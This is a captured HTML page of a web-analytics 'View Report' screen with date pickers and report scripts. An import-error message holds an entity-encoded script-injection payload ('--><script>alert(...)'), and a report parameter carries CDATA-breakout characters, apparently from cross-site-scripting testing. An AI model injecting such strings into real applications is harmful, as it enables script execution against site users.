PageMethods.set_defaultSucceededCallback = function(value) { PageMethods._staticInstance.set_defaultSucceededCallback(value); }
PageMethods.get_defaultSucceededCallback = function() { return PageMethods._staticInstance.get_defaultSucceededCallback(); }
PageMethods.set_defaultFailedCallback = function(value) { PageMethods._staticInstance.set_defaultFailedCallback(value); }
PageMethods.get_defaultFailedCallback = function() { return PageMethods._staticInstance.get_defaultFailedCallback(); }
PageMethods.set_enableJsonp = function(value) { PageMethods._staticInstance.set_enableJsonp(value); }
PageMethods.get_enableJsonp = function() { return PageMethods._staticInstance.get_enableJsonp(); }
PageMethods.set_jsonpCallbackParameter = function(value) { PageMethods._staticInstance.set_jsonpCallbackParameter(value); }
PageMethods.get_jsonpCallbackParameter = function() { return PageMethods._staticInstance.get_jsonpCallbackParameter(); }
PageMethods.set_path("frmViewReports.aspx");
PageMethods.GetReportProgress= function(guid,onSuccess,onFailed,userContext) {PageMethods._staticInstance.GetReportProgress(guid,onSuccess,onFailed,userContext); }
//]]>
</script>


       <script type="text/javascript">
           self.EnableAnimations = true;
       </script>

       <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask="></script>
       <script type="text/javascript">
//<![CDATA[
Sys.WebForms.PageRequestManager._initialize('ctl00$ScriptManager1', 'aspnetForm', ['tctl00$BPH$UpdatePanel2','','tctl00$UpdatePanel1','','tctl00$MPH$UpdatePanel1','','tctl00$MPH$UP1',''], ['ctl00$MPH$btnGenerateReport','','ctl00$MPH$btnShowReport',''], [], 90, 'ctl00');
//]]>
</script>

       
           <div id="ctl00_TitleBar_HeaderPanel" class="PageTitle">
               <div class="RoundedPageTitleLeft">
                   <div id="PageTitle" class="PageTitleText">
                       View Report
                   </div>
               </div>
           </div>
       
       <div id="ctl00_ButtonRow" class="ButtonBar">
           <div class="ButtonBarLeft">
               
   <div id="ctl00_BPH_UpdatePanel2">
   
           
           <div id="ctl00_BPH_btnSendEmail" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="EmailReportPopup(); return false;"><span class="BBInner">Email</span></a></div>
           <div id="ctl00_BPH_btnExport" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="ExportReportPopup(); return false;"><span class="BBInner">Export</span></a></div>
           <div id="ctl00_BPH_btnPrint" class="BBButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick="PrintReportPopup(); return false;"><span class="BBInner">Print</span></a></div>
       
</div>

           </div>
           <div class="ButtonBarRight">
               

           </div>
           <div class="ButtonBarClear">
               <div class="ie6fix">
                   &nbsp;</div>
           </div>
       </div>
       
       
       
       <span id="ctl00_UpdatePanel1">
               <div id="ctl00_TipTextDiv" class="TipTextContainer">
                   <div class="TipTextFailure">Import Error: 10/11/2010 8:02 PM - ERROR: Could not save SiteHistory file C:\&#x0022;&#x002D;&#x002D;&#x003E;&#x003C;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003E;&#x0061;&#x006C;&#x0065;&#x0072;&#x0074;&#x0028;&#x0030;&#x0078;&#x0030;&#x0030;&#x0030;&#x0037;&#x0046;&#x0037;&#x0029;&#x003C;&#x002F;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;\WebLogs\1\SiteConfig.xml.new3. As a precaution, this server has been paused. A reboot may be the best way to solve any file locking problems that may be present.<br><br><br><br></div>
               </div>
           </span>
       
       <div id="Scrollable" class="ContentDiv">
           
   <div class="ReportLoadingProgress" id="ReportLoadingProgress">
       <div class="ProgressContainer" id="ProgressContainer">
           <div class="ProgressBar" id="ProgressBar">
           </div>
       </div>
       <div class="ProgressText" id="ProgressText">
       </div>
   </div>
   <div id="ctl00_MPH_ReportBar" class="ReportOptionsBar">
       <div class='ReportOptionSection'>
           <div>
               <table class='ReportOptionSection'>
                   <tr>
                       <td class='ReportItemOptionLabel'>
                           Date Range
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadStartDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <!-- 2010.2.817.40 --><input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate" name="ctl00$MPH$RadStartDate" type="text" class="rdfd_" value="2010-10-05" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadStartDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/5/2010" id="ctl00_MPH_RadStartDate_dateInput_text" name="ctl00_MPH_RadStartDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadStartDate_dateInput" name="ctl00$MPH$RadStartDate$dateInput" type="text" class="rdfd_" value="2010-10-05-00-00-00" /><input id="ctl00_MPH_RadStartDate_dateInput_ClientState" name="ctl00_MPH_RadStartDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadStartDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadStartDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadStartDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadStartDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadStartDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadStartDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadStartDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadStartDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadStartDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadStartDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadStartDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadStartDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_SD" id="ctl00_MPH_RadStartDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadStartDate_calendar_AD" id="ctl00_MPH_RadStartDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadStartDate_ClientState" name="ctl00_MPH_RadStartDate_ClientState" type="hidden" />
</div>
                       </td>
                       <td class='PaddedText'>
                           to
                       </td>
                       <td>
                           <div id="ctl00_MPH_RadEndDate_wrapper" class="RadPicker RadPicker_SmarterTools DatePickerOverride" style="display:inline-block;width:150px;">
   <input style="visibility:hidden;display:block;float:right;margin:0 0 -1px -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate" name="ctl00$MPH$RadEndDate" type="text" class="rdfd_" value="2010-10-11" /><table cellspacing="0" class="rcTable" style="width:100%;">
       <tr>
           <td class="rcInputCell" style="width:100%;"><span id="ctl00_MPH_RadEndDate_dateInput_wrapper" class="RadInput RadInput_SmarterTools" style="display:block;white-space:normal;"><input type="text" value="10/11/2010" id="ctl00_MPH_RadEndDate_dateInput_text" name="ctl00_MPH_RadEndDate_dateInput_text" class="riTextBox riEnabled" style="width:100%;" /><input style="visibility:hidden;float:right;margin:-18px 0 0 -1px;width:1px;height:1px;overflow:hidden;border:0;padding:0;" id="ctl00_MPH_RadEndDate_dateInput" name="ctl00$MPH$RadEndDate$dateInput" type="text" class="rdfd_" value="2010-10-11-00-00-00" /><input id="ctl00_MPH_RadEndDate_dateInput_ClientState" name="ctl00_MPH_RadEndDate_dateInput_ClientState" type="hidden" /></span></td><td><a title="Open the calendar popup." href="#" id="ctl00_MPH_RadEndDate_popupButton" onclick="return CalendarPopup($find(&#39;ctl00_MPH_RadEndDate&#39;),&#39;cal&#39;);"><img id="ctl00_MPH_RadEndDate_CalendarPopupButton" src="/App_Themes/Default/Images/16x16/CalendarMonth.gif" alt="Open the calendar popup." style="border-width:0px;" /></a><div id="ctl00_MPH_RadEndDate_calendar_wrapper" style="display: none" ><table id="ctl00_MPH_RadEndDate_calendar" summary="Calendar" cellspacing="0" class="RadCalendar RadCalendar_SmarterTools" border="0">
               <thead>
                   <tr>
                       <td class="rcTitlebar"><table cellspacing="0" summary="title and navigation" border="0">
                           <tr>
                               <td><a id="ctl00_MPH_RadEndDate_calendar_FNP" class="rcFastPrev" title="&lt;&lt;" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_NP" class="rcPrev" title="&lt;" href="#"></a></td><td id="ctl00_MPH_RadEndDate_calendar_Title" class="rcTitle">October 2010</td><td><a id="ctl00_MPH_RadEndDate_calendar_NN" class="rcNext" title=">" href="#"></a></td><td><a id="ctl00_MPH_RadEndDate_calendar_FNN" class="rcFastNext" title=">>" href="#"></a></td>
                           </tr>
                       </table></td>
                   </tr>
               </thead><tbody>
   <tr>
       <td class="rcMain"><table id="ctl00_MPH_RadEndDate_calendar_Top" class="rcMainTable" cellspacing="0" summary="October 2010" border="0">
   <thead>
       <tr class="rcWeek">
           <th id="ctl00_MPH_RadEndDate_calendar_Top_cs_0" title="Sunday" abbr="Sun" scope="col">S</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_1" title="Monday" abbr="Mon" scope="col">M</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_2" title="Tuesday" abbr="Tue" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_3" title="Wednesday" abbr="Wed" scope="col">W</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_4" title="Thursday" abbr="Thu" scope="col">T</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_5" title="Friday" abbr="Fri" scope="col">F</th><th id="ctl00_MPH_RadEndDate_calendar_Top_cs_6" title="Saturday" abbr="Sat" scope="col">S</th>
       </tr>
   </thead><tbody>
       <tr class="rcRow">
           <td class="rcOtherMonth" title="Sunday, September 26, 2010"><a href="#">26</a></td><td class="rcOtherMonth" title="Monday, September 27, 2010"><a href="#">27</a></td><td class="rcOtherMonth" title="Tuesday, September 28, 2010"><a href="#">28</a></td><td class="rcOtherMonth" title="Wednesday, September 29, 2010"><a href="#">29</a></td><td class="rcOtherMonth" title="Thursday, September 30, 2010"><a href="#">30</a></td><td title="Friday, October 01, 2010"><a href="#">1</a></td><td class="rcWeekend" title="Saturday, October 02, 2010"><a href="#">2</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 03, 2010"><a href="#">3</a></td><td title="Monday, October 04, 2010"><a href="#">4</a></td><td title="Tuesday, October 05, 2010"><a href="#">5</a></td><td title="Wednesday, October 06, 2010"><a href="#">6</a></td><td title="Thursday, October 07, 2010"><a href="#">7</a></td><td title="Friday, October 08, 2010"><a href="#">8</a></td><td class="rcWeekend" title="Saturday, October 09, 2010"><a href="#">9</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 10, 2010"><a href="#">10</a></td><td title="Monday, October 11, 2010"><a href="#">11</a></td><td title="Tuesday, October 12, 2010"><a href="#">12</a></td><td title="Wednesday, October 13, 2010"><a href="#">13</a></td><td title="Thursday, October 14, 2010"><a href="#">14</a></td><td title="Friday, October 15, 2010"><a href="#">15</a></td><td class="rcWeekend" title="Saturday, October 16, 2010"><a href="#">16</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 17, 2010"><a href="#">17</a></td><td title="Monday, October 18, 2010"><a href="#">18</a></td><td title="Tuesday, October 19, 2010"><a href="#">19</a></td><td title="Wednesday, October 20, 2010"><a href="#">20</a></td><td title="Thursday, October 21, 2010"><a href="#">21</a></td><td title="Friday, October 22, 2010"><a href="#">22</a></td><td class="rcWeekend" title="Saturday, October 23, 2010"><a href="#">23</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 24, 2010"><a href="#">24</a></td><td title="Monday, October 25, 2010"><a href="#">25</a></td><td title="Tuesday, October 26, 2010"><a href="#">26</a></td><td title="Wednesday, October 27, 2010"><a href="#">27</a></td><td title="Thursday, October 28, 2010"><a href="#">28</a></td><td title="Friday, October 29, 2010"><a href="#">29</a></td><td class="rcWeekend" title="Saturday, October 30, 2010"><a href="#">30</a></td>
       </tr><tr class="rcRow">
           <td class="rcWeekend" title="Sunday, October 31, 2010"><a href="#">31</a></td><td class="rcOtherMonth" title="Monday, November 01, 2010"><a href="#">1</a></td><td class="rcOtherMonth" title="Tuesday, November 02, 2010"><a href="#">2</a></td><td class="rcOtherMonth" title="Wednesday, November 03, 2010"><a href="#">3</a></td><td class="rcOtherMonth" title="Thursday, November 04, 2010"><a href="#">4</a></td><td class="rcOtherMonth" title="Friday, November 05, 2010"><a href="#">5</a></td><td class="rcOtherMonth" title="Saturday, November 06, 2010"><a href="#">6</a></td>
       </tr>
   </tbody>
</table></td>
   </tr>
</tbody>
           </table><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_SD" id="ctl00_MPH_RadEndDate_calendar_SD" value="[]" /><input type="hidden" name="ctl00_MPH_RadEndDate_calendar_AD" id="ctl00_MPH_RadEndDate_calendar_AD" value="[[1800,1,1],[2200,1,1],[2010,10,11]]" /></div></td>
       </tr>
   </table><input id="ctl00_MPH_RadEndDate_ClientState" name="ctl00_MPH_RadEndDate_ClientState" type="hidden" />
</div>
                       </td>
                   </tr>
               </table>
           </div>
           <div>
               <table cellspacing='0' class='ReportOptionSection'>
                   <tr>
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       
                       <td class='GenerateReportButton'>
                           <div id="ctl00_MPH_btnGenerateReport" class="BBButton RefreshButton"><a class="ButtonBarAnchor" target="_self" href="#" tabindex='0' onclick=" __doPostBack('ctl00$MPH$btnGenerateReport',''); return false;"><span class="BBInner"></span></a></div>
                       </td>
                   </tr>
               </table>
           </div>
       </div>
       <div class='ReportOptionSection' style='display: none'>
           <div id="ctl00_MPH_UpdatePanel1">
   
                   <table cellspacing='0' class='ReportOptionSection'>
                       <tr>
                           <td class='ReportTitle'>
                               <span id="ctl00_MPH_lblReportTitle"></span>
                           </td>
                           <td class='ReportSubTitle'>
                               (<span id="ctl00_MPH_lblReportSubTitle"></span>)
                           </td>
                       </tr>
                   </table>
               
</div>
       </div>
   </div>
   <input type="hidden" name="ctl00$MPH$hfDMFilename" id="ctl00_MPH_hfDMFilename" />
   <input type="hidden" name="ctl00$MPH$hfDMReport" id="ctl00_MPH_hfDMReport" />
   <div id="ctl00_MPH_UP1">
   
           
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       
</div>
   <input type="submit" name="ctl00$MPH$btnShowReport" value="Display Report" id="ctl00_MPH_btnShowReport" style="display: none" />

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   Logs imported from 1/1/0001 to 12/31/9999

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('client/frmviewreports', 'Standard\x5fSiteUsage\x5d\x5d\x3e\x3e');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       
   <script type="text/javascript" src="/App_Themes/Default/Javascript/JavaScript.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=Specific/ProgressBar"></script>

   <script type="text/javascript">
       var loaded = false;
       function DoDataMine(file, report) {
           //location.href = '/Client/frmViewReports.aspx?reporttype=interactive&file=' + file + '&mine=' + report;
           parent.dmFilename = file;
           parent.dmQuery = report;
           parent.UpdateSection('UserDataMining', null, false, false); //filename
       }
       function AddFavoritePopup() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 320, null);
       }
       function AddFavoritePopup_Interactive() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 500, 270, null);
       }
       function AddFavoritePopup_SEO() {
           var url = "/Client/Popups/frmFavoriteReport.aspx";
           SpawnHyperWindow(url, 375, 230, null);
       }
       function ExportReportPopup() {
           var url = "/Client/Popups/frmExportReport.aspx";
           window.name = "GenericWindow";
           SpawnHyperWindow(url, 400, 100, null);
       }
       function EmailReportPopup() {
           if (false)
           {
            var url = "/Client/Popups/frmEmailReport.aspx";
            window.name = "GenericWindow";
            SpawnHyperWindow(url, 450, 340, null);
           }
           else
           {
            ShowAlertWindow("In order to send reports through email, SMTP information must be entered into the Email Settings page by a site administrator.");
           }
       }
       function PrintReportPopup() {
           var url = "/Client/Popups/frmPrintPreview.aspx";
           parent.GenericPopup(url, "PrintPreview", "width=700,height=500,resizable=yes,scrollbars=yes,status=no");
       }
       function RadDataMine(filename, miningset, report) {
        SpawnHyperWindowWithElement(
        "/Client/Popups/frmDataMine.aspx?file=" + filename + "&miningset=" + miningset + "&report=" + report,
        400, 130, null, DoDataMine);
       }

       function GetProgressUpdate() {
           PageMethods.GetReportProgress(progressGuid, ProgressBarCallbackComplete, ProgressBarCallbackFailed);
       }
       function DoReportPostBack() {
           //
__doPostBack('ctl00$MPH$btnShowReport','');
       }
       function DoReportCancel() {
           //
__doPostBack('ctl00$MPH$lnkCancel','');;
       }
       function SiteUrlUndefined()
       {
           parent.ShowAlertWindow('The Site URL for this site has not been set. In order to view pages, define this value in the site general settings.');
       }
       var ProgressBarText = 'Processing';

   </script>


   

<script type="text/javascript">
//<![CDATA[
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fClient\x2ffrmViewReports\x2easpx?Custom\x3dFalse\x26ReportType\x3dStandard\x26subReportName\x3dSiteUsage\x255d\x255d\x253e\x253e'); });
$(function() { SetTopTitle('View\x20Report'); });
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/5/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadStartDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadStartDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadStartDate_dateInput"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadCalendar, {"_DayRenderChangedDays":{},"_FormatInfoArray":[["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],["January","February","March","April","May","June","July","August","September","October","November","December",""],["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"dddd, MMMM dd, yyyy h:mm:ss tt","dddd, MMMM dd, yyyy","h:mm:ss tt","MMMM dd","ddd, dd MMM yyyy HH\u0027:\u0027mm\u0027:\u0027ss \u0027GMT\u0027","M/d/yyyy","h:mm tt","yyyy\u0027-\u0027MM\u0027-\u0027dd\u0027T\u0027HH\u0027:\u0027mm\u0027:\u0027ss","yyyy\u0027-\u0027MM\u0027-\u0027dd HH\u0027:\u0027mm\u0027:\u0027ss\u0027Z\u0027","MMMM, yyyy","AM","PM","/",":",0],"_ViewRepeatableDays":{},"_ViewsHash":{"ctl00_MPH_RadStartDate_calendar_Top" : [[2010,10,1], 1]},"_calendarWeekRule":0,"_culture":"en-US","_enableKeyboardNavigation":false,"_enableViewSelector":false,"_firstDayOfWeek":7,"_postBackCall":"__doPostBack(\u0027ctl00$MPH$RadStartDate$calendar\u0027,\u0027@@\u0027)","clientStateFieldID":"ctl00_MPH_RadStartDate_calendar_ClientState","enableMultiSelect":false,"enabled":true,"monthYearNavigationSettings":["Today","OK","Cancel","Date is out of range.","False","True","300","1","300","1"],"skin":"SmarterTools","specialDaysArray":[],"stylesHash":{"DayStyle": ["", ""],"CalendarTableStyle": ["", "rcMainTable"],"OtherMonthDayStyle": ["", "rcOtherMonth"],"TitleStyle": ["", ""],"SelectedDayStyle": ["", "rcSelected"],"SelectorStyle": ["", ""],"DisabledDayStyle": ["", "rcDisabled"],"OutOfRangeDayStyle": ["", "rcOutOfRange"],"WeekendDayStyle": ["", "rcWeekend"],"DayOverStyle": ["", "rcHover"],"FastNavigationStyle": ["", "RadCalendarMonthView RadCalendarMonthView_SmarterTools"],"ViewSelectorStyle": ["", "rcViewSel"]},"useColumnHeadersAsSelectors":false,"useRowHeadersAsSelectors":false}, null, null, $get("ctl00_MPH_RadStartDate_calendar"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDatePicker, {"_PopupButtonSettings":{ ResolvedImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif", ResolvedHoverImageUrl : "/App_Themes/Default/Images/16x16/CalendarMonth.gif"},"_animationSettings":{ShowAnimationDuration:300,ShowAnimationType:1,HideAnimationDuration:300,HideAnimationType:1},"_popupControlID":"ctl00_MPH_RadStartDate_popupButton","clientStateFieldID":"ctl00_MPH_RadStartDate_ClientState","focusedDate":"2010-10-11-00-00-00","maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00"}, null, {"calendar":"ctl00_MPH_RadStartDate_calendar","dateInput":"ctl00_MPH_RadStartDate_dateInput"}, $get("ctl00_MPH_RadStartDate"));
});
Sys.Application.add_init(function() {
$create(Telerik.Web.UI.RadDateInput, {"_focused":false,"_originalValue":"10/11/2010 12:00:00 AM","_postBackEventReferenceScript":"__doPostBack(\u0027ctl00$MPH$RadEndDate\u0027,\u0027\u0027)","_skin":"SmarterTools","clientStateFieldID":"ctl00_MPH_RadEndDate_dateInput_ClientState","dateFormat":"M/d/yyyy","dateFormatInfo":{"DayNames":["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],"MonthNames":["January","February","March","April","May","June","July","August","September","October","November","December",""],"AbbreviatedDayNames":["Sun","Mon","Tue","Wed","Thu","Fri","Sat"],"AbbreviatedMonthNames":["Jan","Feb","Mar","Apr","May","Jun","Jul","Aug","Sep","Oct","Nov","Dec",""],"AMDesignator":"AM","PMDesignator":"PM","DateSeparator":"/","TimeSeparator":":","FirstDayOfWeek":0,"DateSlots":{"Month":0,"Year":2,"Day":1},"ShortYearCenturyEnd":2029,"TimeInputOnly":false},"displayDateFormat":"M/d/yyyy","enabled":true,"incrementSettings":{InterceptArrowKeys:true,InterceptMouseWheel:true,Step:1},"maxDate":"2200-01-01-00-00-00","minDate":"1800-01-01-00-00-00","styles":{HoveredStyle: ["width:100%;", "riTextBox riHover"],InvalidStyle: ["width:100%;", "riTextBox riError"],DisabledStyle: ["width:100%;", "riTextBox riDisabled"],FocusedStyle: ["width:100%;", "riTextBox riFocused"],EmptyMessageStyle: ["width:100%;", "riTextBox riEmpty"],ReadOnlyStyle: ["width:100%;", "riTextBox riRead"],EnabledStyle: ["width:100%;", "riTextBox riEnabled"]}}, null, null, $get("ctl00_MPH_RadEndDate_dateInput"));
});
Sys.Application.add_init(function() {
